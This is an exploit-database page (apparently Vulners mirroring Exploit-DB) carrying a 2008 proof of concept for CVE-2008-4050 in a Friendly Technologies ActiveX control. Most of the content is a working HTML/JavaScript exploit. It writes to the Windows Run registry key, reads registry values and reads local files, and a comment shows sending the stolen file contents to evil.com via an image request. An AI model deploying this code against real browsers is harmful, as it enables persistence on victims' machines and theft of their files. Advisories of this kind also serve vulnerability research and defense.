Lucene search
+L

Friendly Technologies - Read/Write Registry/Read Files

🗓️ 30 Aug 2008 00:00:00Reported by spdrType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Friendly Technologies - Read/Write Registry/Read Files Proof of Concep

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4050
30 Aug 200800:00
circl
cve
CVE
CVE-2008-4050
11 Sep 200814:00
cve
cvelist
Cvelist
CVE-2008-4050
11 Sep 200814:00
cvelist
euvd
EUVD
EUVD-2008-4035
11 Sep 200814:00
euvd
nvd
NVD
CVE-2008-4050
11 Sep 200821:06
nvd
prion
Prion
Design/Logic Flaw
11 Sep 200821:06
prion
<!--
Proof of Concept...
Read write to registry
and also read files

More codes at irc.nix.co.il/#binaryvision !
-->

<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>

<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here";

// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);

// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>

# milw0rm.com [2008-08-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Aug 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.06749
34